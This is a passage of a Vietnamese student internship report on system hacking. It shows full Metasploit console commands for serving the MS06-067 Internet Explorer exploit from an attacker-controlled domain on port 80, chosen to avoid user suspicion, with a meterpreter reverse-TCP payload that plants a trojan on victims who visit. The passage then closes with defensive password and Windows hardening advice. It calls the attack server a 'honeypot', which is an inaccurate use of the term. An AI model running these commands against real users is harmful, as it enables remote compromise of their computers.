của chúng, ngăn không cho chúng tiếp xúc với hệ thống thật. Hệ thống tài nguyên

thông tin có nghĩa là Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào

như là Mail Server, Domain Name Server, Web Server… Honeypot sẽ trực tiếp

tương tác với tin tặc và tìm cách khai thác thông tin về tin tặc như hình thức tấn

công, công cụ tấn công hay cách thức tiến hành thay vì bị tấn công. Với mục tiêu

xây dựng Honeypot để xâm nhập vào lỗ hổng hệ thống máy tính qua Internet,

Hacker có thể sử dụng Máy chủ ảo (VPS) và cài đặt Honeypot để giả dạng là một

Web server bình thường, từ đó đánh lừa máy nạn nhân khi một máy tính bất kỳ có

kết nối Internet truy cập vào địa chỉ mà VPS cung cấp.

3. Sơ đồ tổng quan sử dụng Honeypot xâm nhập từ xa thông qua internet

Hình 5: sơ đồ tổng quan sử dụng HonepotChúng ta – đóng vài trò là Attacker, cần chuẩn bị:

VPS có địa chỉ IP public, cài đặt sẵn công cụ Metasploit (download tại

http://metasploit.org) đóng vai trò là một Honeypot trên mạng.

28SVTH: Dương Văn Hòa

Page 29: Baocaothuctap athena

hình 10: đã cài đặt thành công metasploit trên VPS

4. Tấn công trên internet

Lỗ hổng khai thác: Ms 06_067. Điều kiện: Windows XP without service pack,

trình duyệt Internet Explorer 6.0

Mô tả:

Là lỗi làm cho IE bị tràn bộ đệm, để có thể dựa vào đó mà tấn công và thực

hiện mã lệnh từ xa.

Hệ điều hành bị ảnh hưởng:

Windows XP Universal

Windows 2000 Universal

Windows Server 2003 Universal

29SVTH: Dương Văn Hòa

Page 30: Baocaothuctap athena

Tại cửa sổ Metasploit console, ta sử dụng các lệnh sau để tạo một server lắng nghe

các sự truy cập từ bên ngoài.

use exploit/windows/browser/ms06_067_keyframe (Sử dụng lỗi Ms06_067)

show options (Xem thông tin thiết đặt)

set srvhost ptuananh.tk (VPS được đăng ký domain là http://ptuananh.tk )

set lhost ptuananh.tk

set uripath winxp (Đường dẫn kèm theo Domain, nếu để mặc định,

metasploit sẽ chọn ngẫu nhiên đường dẫn bất kỳ)

set srvport 80 (Chọn port 80, VPS như một Web Server, tránh sự nghi ngờ

của người dùng)

set payload windows/meterpreter/reverse_tcp

exploit

Công việc tiếp theo là chờ cho máy mục tiêu truy cập vào địa chỉ:

http://ptuananh.tk/winxp . Ngay lúc đó, server trên VPS chúng ta sẽ tiến hành gửi

trojan về máy mục tiêu.

hình 11: gửi Trojan về máy victim

30SVTH: Dương Văn Hòa

Page 31: Baocaothuctap athena

Bây giờ ta tiến hành khai thác máy nạn nhân với mục đích trước khi tấn công

hình 12: khai thác thông tin từ máy victim

31SVTH: Dương Văn Hòa

Page 32: Baocaothuctap athena

CHƯƠNG 4: TỔNG KẾT

Với những kiểu tấn công hệ thống dựa trên những lỗi sai sót trong quá trình sử dụng máy tính hoặc các lỗi về bảo mật vật lý, có một số phương pháp nhằm giảm thiểu và phòng tránh việc Hacker đánh cắp Mật khẩu như sau:

Mật khẩu phải được đặt nhiều hơn 8 ký tự và phải là tổng hợp giữa chữ hoa, chữ thường, số và ký tự đặc biệt để các chương trình khó dò ra.

Cấu hình trong registry cho mật khẩu trong hệ thống windows chỉ được băm và lưu dưới dạng NTLM để các chương trình khó khăn để dò tim. Bật lên 1 ở khóa:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash

Người dùng admin nên xóa tập tin sam trong thư mục Windows/repair sau mỗi lần backup dữ liệu bằng rdisk.

Trong quá trình sử dụng máy tính để truy cập Internet, người dùng cần lưu ý:

Không mở tập tin đính kèm thư điện tử có nguồn gốc không rõ ràng hoặc không tin cậy.

Chắc chắn rằng bạn có và đã bật hệ thống tường lửa cho hệ thống của mình.

Đảm bảo Windows của bạn được cập nhật thường xuyên, phần mềm bảo mật của bạn có chức năng cập nhật "live" (tự động cập nhật trực tuyến).

Microsoft đã xây dựng một loạt các công cụ trong Windows để các nhà quản trị cũng như người dùng có kinh nghiệm có thể phân tích chiếc máy tính của mình xem liệu nó có đang bị xâm phạm hay không. Một khi nghi ngờ máy tính của mình bị xâm nhập, người dùng có thể sử dụng các công cụ này để tự kiểm tra máy tính của mình khi có những biểu hiện đáng ngờ: WMIC, Lệnh net, Openfiles, Netstat, Find.

32SVTH: Dương Văn Hòa

Page 33: Baocaothuctap athena

TÀI LIỆU THAM KHẢO

Sử dụng BackTrack 5 khai thác lỗ hổng mạng.

Tài liệu system hacking của Athena

Tài liệu hacker mũ trắng Athena

http://www.hackyshacky.com/2013/03/how-to-hack-facebook-with-backtrack-5.html

http://www.slideshare.net/Anhphailamthenao/bo-co-thc-tp-system-hacking?related=5

https://www.youtube.com/watch?

v=g1Xo7K2osxE&list=PL6Elfw63yI9RVQLXsK_V7XyHmiJc_9v56

http://suamaytinhtainha.info/thu-thuat-may-tinh/cach-hack-may-tinh-trong-mang-lan-

bang-backtrack-5.html

33SVTH: Dương Văn Hòa